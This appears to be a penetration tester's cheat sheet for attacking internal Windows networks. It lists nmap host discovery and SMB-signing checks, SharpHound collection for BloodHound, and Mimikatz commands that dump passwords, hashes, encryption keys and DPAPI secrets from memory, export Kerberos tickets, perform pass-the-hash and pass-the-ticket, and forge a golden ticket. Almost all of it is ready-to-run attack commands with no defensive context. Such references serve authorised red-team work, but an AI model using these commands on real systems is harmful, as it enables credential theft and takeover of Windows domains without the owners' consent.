Internal (Windows)
General
We should verify if the machine is domain joined or not.
NMap
Find Uphosts:
nmap -sn -iL targets.txt -oG - | ForEach-Object { if ($_ -match "Up$") { ($_ -split ' ')[1] } } > up-hosts.txt
Scan and output to file:
nmap -p 80 --open -iL targets.txt > 80.txt
SMB Signing Not Required:
nmap -p 445 -iL uphosts.txt --script smb2-security-mode.nse > smb-signing-not-required.txt
SNMP Info (default community name)
nmap -Pn -sV -p 161 --script=snmp-info IP
Puts saved output into a list of IPs:
Select-String -Path "input.txt" -Pattern '\b(?:\d{1,3}\.){3}\d{1,3}\b' | ForEach-Object { $_.Matches.Value } > output.txt
Sharphound
Ingest Files for bloodhound
Sharphound.exe -u USER -p 'PASSWORD' -d DOMAIN -c All
Mimikatz
Enable debug privileges
privilege::debug
sekurlsa
Extract credentials from the system's memory
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
Dump and export Kerberos tickets from memory
sekurlsa::tickets /export
Pass the hash - PTH
sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:cmd
kerberos
Dump and export Kerberos tickets from memory associated with active user sessions
kerberos::list /export
Pass the ticket - PTT
kerberos::ptt c:\TICKET
Create a Golden Ticket
kerberos::golden /admin:DOMAIN-ADMIN /domain:DOMAIN /sid:USER-SID /krbtgt:KRBTGT /ticket:TICKET
TGT
Interact with and manipulate Kerberos tickets
kerberos
ekeys
Dump encryption keys from the system's memory
sekurlsa::ekeys
DPAPI
Extract and decrypt credentials protected by DPAPI (Data Protection API) from memory
sekurlsa::dpapi
Last updated